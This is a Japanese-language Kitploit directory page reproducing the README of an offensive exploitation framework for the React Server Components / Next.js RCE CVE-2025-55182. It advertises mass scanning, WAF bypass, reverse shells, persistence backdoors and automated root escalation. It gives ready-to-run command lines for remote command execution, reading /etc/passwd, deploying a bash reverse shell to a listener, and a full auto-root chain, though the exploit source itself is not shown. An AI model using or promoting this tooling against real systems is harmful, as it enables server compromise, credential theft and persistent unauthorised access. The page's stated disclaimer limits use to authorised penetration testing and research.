Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Cerberus-React2Shell-Scanner-Exploit — CVE-2025-55182(React Server Components RCE)向けエリートエクスプロイテーションツールキット。非同期ポリモーフィックペイロード、高度なWAF/CDNバイパス、プロキシローテーション、Shodan/Censysマススキャン、auto-pwn + リバースシェル、Nucleiテンプレート、K8sラボ&C2ダッシュボード。著者:Sudeepa Wanigarathna – 許可されたレッドチームおよびペネトレーションテスト専用。 | Kitploit
ツール/GitHubGitHub/cerberusmrxi/cerberus-react2shell-scanner-exploit
ペネトレーションテストフレームワーク特権昇格脆弱性スキャナーエクスプロイトフレームワークシェルコードウェブアプリケーション悪用ポストエクスプロイトコマンド&コントロール学習と教育
レッドチーミング
ペイロード開発
ラボと実践
GitHubcerberusmrxi/cerberus-react2shell-scanner-exploit

Cerberus-React2Shell-Scanner-Exploit

CVE-2025-55182(React Server Components RCE)向けエリートエクスプロイテーションツールキット。非同期ポリモーフィックペイロード、高度なWAF/CDNバイパス、プロキシローテーション、Shodan/Censysマススキャン、auto-pwn + リバースシェル、Nucleiテンプレート、K8sラボ&C2ダッシュボード。著者:Sudeepa Wanigarathna – 許可されたレッドチームおよびペネトレーションテスト専用。

リポジトリを見る
21561ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Cerberus React2Shell - 武器化エクスプロイトフレームワーク

root@kitploit:~
  ██████╗ ███████╗██████╗ ██████╗ ███████╗██████╗ ██╗   ██╗
 ██╔════╝ ██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗██║   ██║
 ██║      █████╗  ██████╔╝██████╔╝█████╗  ██████╔╝██║   ██║
 ██║      ██╔══╝  ██╔══██╗██╔══██╗██╔══╝  ██╔══██╗██║   ██║
 ╚██████╗ ███████╗██║  ██║██████╔╝███████╗██║  ██║╚██████╔╝
  ╚═════╝ ╚══════╝╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝
  
         React2Shell Exploitation Framework v1.0
              Author: Sudeepa Wanigarathna

🎯 概要

Next.js Server Actions RCE 脆弱性(React2Shell)向けのプロフェッショナルグレードのエクスプロイトフレームワーク。初期アクセスから root 権限昇格までの完全な攻撃チェーンを実証します。

機能:

  • ✅ 自動脆弱性検出
  • ✅ リモートコード実行(RCE)
  • ✅ 対話型シェルアクセス
  • ✅ Linux システム列挙
  • ✅ 自動権限昇格
  • ✅ リバースシェル展開
  • ✅ ファイルアップロード/ダウンロード
  • ✅ root アクセス実証

🚀 クイックスタート

基本 RCE

root@kitploit:~
# 脆弱性の確認
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# コマンド実行
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id"

対話型シェル

root@kitploit:~
python3 interactive_shell.py --target http://127.0.0.1:3000

完全自動攻撃チェーン

root@kitploit:~
# 完全なエクスプロイト: RCE → 列挙 → root アクセス
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

📁 フレームワーク構成

root@kitploit:~
Cerberus-React2Shell-Hades/
├── react2shell_exploit.py      # コアエクスプロイトエンジン(400 行以上)
├── demo_exploit.py              # 自動攻撃チェーン(290 行以上)
├── interactive_shell.py         # 対話型シェル(280 行以上)
├── reverse_shell_handler.py     # リバースシェルリスナー(180 行以上)
├── post_exploit/
│   ├── linux_enum.py           # システム列挙(330 行以上)
│   ├── priv_esc.py             # 権限昇格(320 行以上)
│   └── __init__.py
├── EXPLOITATION_GUIDE.md        # 完全な使用ドキュメント
├── QUICKSTART.md                # クイックリファレンス
└── BANNER.txt

🔥 機能

コアエクスプロイトエンジン

  • Action ID 検出: JavaScript バンドルからの自動抽出
  • 複数ペイロード: execSync、spawn、eval、mainModule のバリエーション
  • 出力抽出: エラーレスポンスからのコマンド出力解析
  • WAF バイパス: ペイロード難読化テクニック

ポストエクスプロイト

  • Linux 列挙: SUID/SGID バイナリ、書き込み可能パス、cron ジョブ、カーネルバージョン
  • 権限昇格: GTFOBins、書き込み可能な /etc ファイル、Docker エスケープ、ケーパビリティ
  • ファイル操作: base64 エンコーディングによるアップロード/ダウンロード
  • 永続化: 複数のバックドア手法

対話型ツール

  • 対話型シェル: 組み込みコマンドによるリアルタイムコマンド実行
  • リバースシェル: 複数のシェルタイプ(bash、python、nc、perl)
  • デモモード: 6 ステップの自動デモンストレーション

📖 使用例

1. 基本コマンド

root@kitploit:~
# 脆弱性チェック
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --check

# コマンド実行
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "whoami"
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "cat /etc/passwd"

# 異なるペイロードバリアント
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --variant spawn

# 難読化あり
python3 react2shell_exploit.py --target http://127.0.0.1:3000 --cmd "id" --obfuscate

2. 対話型シェル

root@kitploit:~
# シェルの起動
python3 interactive_shell.py --target http://127.0.0.1:3000

# 利用可能なコマンド:
# - execute <cmd>        : シェルコマンドを実行
# - enum                 : 完全な列挙を実行
# - escalate             : 権限昇格を試行
# - upload <local> <remote>  : ファイルをアップロード
# - download <remote> <local>: ファイルをダウンロード
# - shell <lhost> <lport>: リバースシェルを展開
# - info                 : セッション情報を表示
# - exit                 : 終了

3. リバースシェル

root@kitploit:~
# ターミナル 1: リスナーを起動
python3 reverse_shell_handler.py --lport 4444

# ターミナル 2: シェルを展開
python3 react2shell_exploit.py --target http://127.0.0.1:3000 \
  --revshell --lhost 127.0.0.1 --lport 4444 --shell-type bash

4. 自動デモ

root@kitploit:~
# 完全チェーン: 検出 → RCE → 列挙 → root
python3 demo_exploit.py --target http://127.0.0.1:3000 --auto-root

🎯 攻撃チェーン

このフレームワークは完全な 6 ステップのエクスプロイトチェーンを実装しています:

  1. 検出 - JavaScript バンドルから Server Action ID を抽出
  2. エクスプロイト - 動作する Action ID を見つけて RCE を達成
  3. 検証 - id コマンドでコード実行を確認
  4. 列挙 - システム情報、SUID バイナリ、書き込み可能パスを収集
  5. 昇格 - 権限昇格ベクターを自動的に悪用
  6. 実証 - /etc/shadow の読み取りと /root の一覧表示で root アクセスを証明

🛡️ 権限昇格テクニック

実装済みメソッド

  1. SUID バイナリ(GTFOBins)

    • find、vim、python、perl、bash、awk、sed、less、more、nmap
  2. 書き込み可能な /etc ファイル

    • /etc/passwd - 新しい root ユーザーを追加
    • /etc/shadow - root パスワードをクリア
    • /etc/sudoers - NOPASSWD sudo を付与
  3. Docker エスケープ

    • アクセス可能な Docker ソケットの悪用
    • 特権コンテナの脱出
  4. カーネルエクスプロイト

    • DirtyCow(CVE-2016-5195)
    • Dirty Pipe(CVE-2022-0847)
    • PwnKit(CVE-2021-4034)
  5. Linux ケーパビリティ

    • CAP_SETUID、CAP_DAC_OVERRIDE の悪用

📊 統計

  • 総コード行数: 1,800 行以上
  • モジュール数: 8
  • 権限昇格テクニック数: 5
  • ペイロードバリアント数: 4
  • シェルタイプ数: 4(bash、python、nc、perl)

⚙️ 要件

root@kitploit:~
pip install -r requirements.txt

依存関係:

  • requests
  • colorama

📚 ドキュメント

  • EXPLOITATION_GUIDE.md - 例付きの完全な使用ガイド
  • QUICKSTART.md - 一般的なコマンドのクイックリファレンス

⚠️ 免責事項

警告: このツールは許可されたセキュリティテスト専用です。コンピュータシステムへの不正アクセスは違法です。所有しているシステム、または明示的な書面によるテスト許可を得たシステムでのみ使用してください。

作者はこのツールの誤用について一切の責任を負いません。自己責任で使用してください。

🎓 教育目的

このフレームワークは以下を目的として設計されています:

  • Next.js の脆弱性を研究するセキュリティ研究者
  • 許可を得たペネトレーションテスター
  • セキュリティトレーニングと CTF チャレンジ
  • 管理されたラボ環境での脆弱性研究

📄 ライセンス

MIT ライセンス(教育目的のみ)

👤 著者

Sudeepa Wanigarathna

  • エクスプロイト開発の専門家
  • セキュリティ研究者
  • ペネトレーションテスター

バージョン: 1.0
最終更新日: 2025 年 12 月

詳細な使用手順については、EXPLOITATION_GUIDE.md を参照してください。

ツールをダウンロード